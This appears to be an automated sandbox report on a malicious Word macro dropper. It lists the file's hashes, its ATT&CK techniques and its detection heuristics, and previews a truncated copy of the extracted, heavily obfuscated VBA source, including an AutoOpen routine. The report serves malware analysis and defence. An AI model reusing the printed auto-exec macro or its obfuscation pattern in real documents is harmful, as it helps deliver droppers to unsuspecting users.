Office (OLE) malware analysis — malicious · 433718793d22b4b7

MALICIOUS

Office (OLE)

182.0 KB Created: 2018-04-26 07:10:00 Authoring application: Microsoft Office Word First seen: 2018-06-30

MD5: 38b92cca6169486e95dae54450ab3ae8 SHA-1: 9f27f14c0aeea82c12a519e28da68a148e9557ee SHA-256: 433718793d22b4b76d32ff24f4073c4f0695faa987b8e7f097662a935b2e3e02

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function and a Shell() call. ClamAV identified it as Doc.Dropper.Agent-6518926-0, indicating it's a dropper. The VBA script is heavily obfuscated, but the presence of AutoOpen and Shell() strongly suggests it's designed to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6518926-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6518926-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58985 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	58985 bytes
SHA-256: `e01a0ef496221e7aa799032ed3aa2d6ad0c378d64f8be02d9659c5868fa1ae0b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fzcJdPKQGBU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub qdspn(tkPEw) Select Case GUNGw Case 79172 iAdSb = Hex(tRYVka - ChrW(TAUnO)) jijzj = CByte(66305) CkQrDO = QfPNK Case 32411 uuUPf = drGAZs IpzCwk = Round(54408) IAhSVN = Log(nkGdz) End Select End Sub Sub lnMiBE(LdQRK) Select Case EaiNQZ Case 78002 mtnzJP = Hex(EVtvv - ChrW(WBlTvf)) PijPH = CByte(88727) dEXqD = OzuYk Case 84700 wGIXVP = iZztUt VHJXqP = Round(12120) zzCrmY = Log(HMiDq) End Select Select Case IWMtr Case 11096 EHiVJb = Hex(skAuci - ChrW(HKUdd)) LRkKR = CByte(6615) Mkzdw = frsTh Case 65157 fdWMo = HJBMrP qPmWT = Round(7432) DjHmW = Log(TDIOqn) End Select Select Case SjiuYW Case 82626 NKYGNj = Hex(QFVzd - ChrW(HzWkpr)) EBmVE = CByte(38035) GhrwzM = pVjjI Case 24269 nDtqJ = KkMKj jrMYDB = Round(88891) MjNXCQ = Log(RdmDj) End Select End Sub Sub GQztiu(mVUjOS) Select Case TdzfiO Case 48428 EpVosE = Hex(GZHDzd - ChrW(OiYHvB)) OjIjnz = CByte(77637) HYRFSM = XqBut Case 28876 ZLTzsO = HXTXw JNFFGE = Round(51567) jltKO = Log(HiFAH) End Select Select Case SHwPoF Case 49908 zAwiV = Hex(wKkwo - ChrW(odqaZp)) HLYSTP = CByte(40922) BQpQB = NSimLo Case 85364 wzIMS = oQWqzc CbhfS = Round(1186) wuvjmL = Log(LHnOAk) End Select End Sub Sub Autoopen() On Error Resume Next Select Case ObKGzh Case 67531 tzRZLL = Hex(BHtntL - ChrW(CcZHM)) JjbwrU = CByte(76217) WYUSP = AwONz Case 29737 GfUMr = LYihpV cKXTi = Round(83163) qijYV = Log(ACFNLH) End Select TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cboriz) Select Case jpZuf Case 16050 icwvrM = Hex(ITUViX - ChrW(ZHPhiJ)) PqsuXV = CByte(31616) jSfzF = aGLunu Case 37111 TVwZL = iJNzw OmEBUr = Round(42685) mCpiST = Log(ADnvOc) End Select End Sub Sub WWzzJ(iXFiA) Select Case PoCKZ Case 91044 XVRfO = Hex(rKhFZ - ChrW(jTGPh)) WhPRP = CByte(93247) hIELw = NzqEmF Case 83680 pSvzSf = RpIYUG NIGGU = Round(45896) wnziLM = Log(tPUJq) End Select Select Case hPTUz Case 32499 QTvmim = Hex(mhwjk - ChrW(CqfwO)) TdXan = CByte(28890) mVzolJ = wQfrM Case 9195 BQMQo = WRqkX qzwst = Round(14968) zzoos = Log(XjXmL) End Select Select Case kJjRNL Case 19698 pHVfNR = Hex(SGwXlj - ChrW(EZNbTD)) sziiz = CByte(75193) KjljiI = siJbah Case 9582 YOZDvE = ElsHh IqAPii = Round(15536) NrCbH = Log(vDzsV) End Select End Sub Sub RaQEt(sCczob) Select Case kjnILw Case 97492 BLXXcn = Hex(MAlzlV - ChrW(hawWmq)) wNCbA = CByte(44436) HuowWP = OshQE Case 694 cNpqFE = NMpJI EzUvbQ = Round(29694) GzCOF = Log(ShOFi) End Select End Sub Attribute VB_Name = "OUzNkvSathznO" Sub MRYlp(klWQnb) Select Case pjfwja Case 35071 jzHKjw = Hex(LYwOAh - ChrW(BJcQv)) dwjaJ = CByte(93089) rNjQMw = dTRaIp Case 92253 ... (truncated)

SHA-256: e01a0ef496221e7aa799032ed3aa2d6ad0c378d64f8be02d9659c5868fa1ae0b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "fzcJdPKQGBU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub qdspn(tkPEw)
Select Case GUNGw
         Case 79172
            iAdSb = Hex(tRYVka - ChrW(TAUnO))
            jijzj = CByte(66305)
            CkQrDO = QfPNK
         Case 32411
            uuUPf = drGAZs
            IpzCwk = Round(54408)
            IAhSVN = Log(nkGdz)
End Select
End Sub
Sub lnMiBE(LdQRK)
Select Case EaiNQZ
         Case 78002
            mtnzJP = Hex(EVtvv - ChrW(WBlTvf))
            PijPH = CByte(88727)
            dEXqD = OzuYk
         Case 84700
            wGIXVP = iZztUt
            VHJXqP = Round(12120)
            zzCrmY = Log(HMiDq)
End Select
Select Case IWMtr
         Case 11096
            EHiVJb = Hex(skAuci - ChrW(HKUdd))
            LRkKR = CByte(6615)
            Mkzdw = frsTh
         Case 65157
            fdWMo = HJBMrP
            qPmWT = Round(7432)
            DjHmW = Log(TDIOqn)
End Select
Select Case SjiuYW
         Case 82626
            NKYGNj = Hex(QFVzd - ChrW(HzWkpr))
            EBmVE = CByte(38035)
            GhrwzM = pVjjI
         Case 24269
            nDtqJ = KkMKj
            jrMYDB = Round(88891)
            MjNXCQ = Log(RdmDj)
End Select
End Sub
Sub GQztiu(mVUjOS)
Select Case TdzfiO
         Case 48428
            EpVosE = Hex(GZHDzd - ChrW(OiYHvB))
            OjIjnz = CByte(77637)
            HYRFSM = XqBut
         Case 28876
            ZLTzsO = HXTXw
            JNFFGE = Round(51567)
            jltKO = Log(HiFAH)
End Select
Select Case SHwPoF
         Case 49908
            zAwiV = Hex(wKkwo - ChrW(odqaZp))
            HLYSTP = CByte(40922)
            BQpQB = NSimLo
         Case 85364
            wzIMS = oQWqzc
            CbhfS = Round(1186)
            wuvjmL = Log(LHnOAk)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case ObKGzh
         Case 67531
            tzRZLL = Hex(BHtntL - ChrW(CcZHM))
            JjbwrU = CByte(76217)
            WYUSP = AwONz
         Case 29737
            GfUMr = LYihpV
            cKXTi = Round(83163)
            qijYV = Log(ACFNLH)
End Select
TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cboriz)
Select Case jpZuf
         Case 16050
            icwvrM = Hex(ITUViX - ChrW(ZHPhiJ))
            PqsuXV = CByte(31616)
            jSfzF = aGLunu
         Case 37111
            TVwZL = iJNzw
            OmEBUr = Round(42685)
            mCpiST = Log(ADnvOc)
End Select
End Sub
Sub WWzzJ(iXFiA)
Select Case PoCKZ
         Case 91044
            XVRfO = Hex(rKhFZ - ChrW(jTGPh))
            WhPRP = CByte(93247)
            hIELw = NzqEmF
         Case 83680
            pSvzSf = RpIYUG
            NIGGU = Round(45896)
            wnziLM = Log(tPUJq)
End Select
Select Case hPTUz
         Case 32499
            QTvmim = Hex(mhwjk - ChrW(CqfwO))
            TdXan = CByte(28890)
            mVzolJ = wQfrM
         Case 9195
            BQMQo = WRqkX
            qzwst = Round(14968)
            zzoos = Log(XjXmL)
End Select
Select Case kJjRNL
         Case 19698
            pHVfNR = Hex(SGwXlj - ChrW(EZNbTD))
            sziiz = CByte(75193)
            KjljiI = siJbah
         Case 9582
            YOZDvE = ElsHh
            IqAPii = Round(15536)
            NrCbH = Log(vDzsV)
End Select
End Sub
Sub RaQEt(sCczob)
Select Case kjnILw
         Case 97492
            BLXXcn = Hex(MAlzlV - ChrW(hawWmq))
            wNCbA = CByte(44436)
            HuowWP = OshQE
         Case 694
            cNpqFE = NMpJI
            EzUvbQ = Round(29694)
            GzCOF = Log(ShOFi)
End Select
End Sub

Attribute VB_Name = "OUzNkvSathznO"
Sub MRYlp(klWQnb)
Select Case pjfwja
         Case 35071
            jzHKjw = Hex(LYwOAh - ChrW(BJcQv))
            dwjaJ = CByte(93089)
            rNjQMw = dTRaIp
         Case 92253
      
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.